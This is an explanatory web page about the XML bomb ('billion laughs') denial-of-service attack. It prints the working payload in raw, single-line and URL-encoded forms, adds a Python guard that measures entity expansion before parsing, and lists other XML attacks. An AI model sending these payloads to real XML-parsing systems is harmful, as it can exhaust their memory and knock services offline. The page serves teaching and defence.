
XML bomb attack

An XML bomb is a type of denial-of-service (DoS) attack that exploits the way some software programs handle XML data. The attack involves sending a specially crafted XML document to a vulnerable system, causing it to consume large amounts of memory and processing resources when it tries to parse the document. This can cause the system to slow down or crash, disrupting normal operation. XML bombs can be used to launch attacks on servers, web applications, and other systems that process XML data. It's important for developers to be aware of this vulnerability and take steps to protect their systems from XML bomb attacks.

😁 billion laughs attack 💣 xml bomb attack

raw: cat lol.xml

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

raw - without new lines: cat lol.xml | tr -d '\n'

<?xml version="1.0"?><!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">]><lolz>&lol9;</lolz>

raw - url encoded: cat lol.xml | python3 -c "import sys, urllib.parse; print(urllib.parse.quote_plus(sys.stdin.read().strip()))"

%3C%3Fxml+version%3D%221.0%22%3F%3E%0A%3C%21DOCTYPE+lolz+%5B%0A+%3C%21ENTITY+lol+%22lol%22%3E%0A+%3C%21ELEMENT+lolz+%28%23PCDATA%29%3E%0A+%3C%21ENTITY+lol1+%22%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%22%3E%0A+%3C%21ENTITY+lol2+%22%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%22%3E%0A+%3C%21ENTITY+lol3+%22%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%22%3E%0A+%3C%21ENTITY+lol4+%22%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%22%3E%0A+%3C%21ENTITY+lol5+%22%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%22%3E%0A+%3C%21ENTITY+lol6+%22%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%22%3E%0A+%3C%21ENTITY+lol7+%22%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%22%3E%0A+%3C%21ENTITY+lol8+%22%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%22%3E%0A+%3C%21ENTITY+lol9+%22%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%22%3E%0A%5D%3E%0A%3Clolz%3E%26lol9%3B%3C%2Flolz%3E
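
A pre-parse guard for documents shaped like lol.xml above, as an added example that is not part of the original page: it computes how large each internal entity would become without ever expanding it, and rejects input whose total exceeds a budget. The function names, the 1,000,000-character budget and both sample documents are assumptions made for this illustration.

```python
import re

# Internal general entities only: <!ENTITY name "value"> (not SYSTEM/PUBLIC or % entities)
ENTITY_DECL = re.compile(r'<!ENTITY\s+([\w.:-]+)\s+(["\'])(.*?)\2\s*>', re.S)
ENTITY_REF = re.compile(r'&([\w.:-]+);')

def expanded_lengths(xml_text):
    """Map each declared entity to its fully expanded length, without expanding it."""
    decls = {}
    for name, _quote, value in ENTITY_DECL.findall(xml_text):
        decls.setdefault(name, value)          # XML: the first declaration wins
    sizes, in_progress = {}, set()

    def size(name):
        if name not in decls:
            return 1                           # predefined (&amp; ...) or undeclared
        if name in sizes:
            return sizes[name]                 # memoized, so the work stays linear
        if name in in_progress:
            raise ValueError("recursive entity reference: " + name)
        in_progress.add(name)
        value = decls[name]
        total = len(ENTITY_REF.sub("", value)) + sum(map(size, ENTITY_REF.findall(value)))
        in_progress.discard(name)
        sizes[name] = total
        return total

    for name in decls:
        size(name)
    return sizes

def check_document(xml_text, max_expanded=1_000_000):
    """Return the estimated expanded size, or raise ValueError if it is over budget."""
    try:
        sizes = expanded_lengths(xml_text)
    except RecursionError:
        raise ValueError("entity nesting too deep") from None
    rest = ENTITY_DECL.sub("", xml_text)
    total = len(ENTITY_REF.sub("", rest)) + sum(sizes.get(r, 1) for r in ENTITY_REF.findall(rest))
    if total > max_expanded:
        raise ValueError("entity expansion of %d characters exceeds budget" % total)
    return total

# Constructed samples: SAMPLE has the same shape as lol.xml above; BENIGN is ordinary use.
_decls = [' <!ENTITY lol "lol">'] + [
    ' <!ENTITY lol%d "%s">' % (i, ("&lol%s;" % (i - 1 or "")) * 10) for i in range(1, 10)]
SAMPLE = '<?xml version="1.0"?>\n<!DOCTYPE lolz [\n' + "\n".join(_decls) + '\n]>\n<lolz>&lol9;</lolz>'
BENIGN = '<?xml version="1.0"?><!DOCTYPE n [<!ENTITY co "Example Ltd">]><n>&co; &amp; &co;</n>'
```

Run the check on the raw bytes before they reach the XML parser; where the application never needs a DTD, rejecting any input that contains a DOCTYPE is the simpler control.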

Other attacks on XML

  • External Entity Injection (XXE): This type of attack involves injecting external entities into an XML document, which can then be used to access sensitive information on the target system.
  • Blind XXE: Similar to XXE, but the attacker cannot directly observe the response from the vulnerable system.
  • XML Injection: This attack involves injecting malicious content into an XML document in order to modify or manipulate the data being processed.
  • XPath Injection: This attack targets the XML Path Language (XPath) used to search and extract data from XML documents. An attacker can inject malicious XPath expressions to access sensitive information or manipulate data.
  • XML Signature Wrapping: This attack involves altering the data within an XML document while maintaining the validity of its digital signature.
  • XML Encryption: This attack involves tampering with encrypted XML data, potentially leading to the exposure of sensitive information.
  • XML Shredding: This attack involves dividing an XML document into multiple parts, which can be reassembled in a way that allows an attacker to bypass security measures or access sensitive information.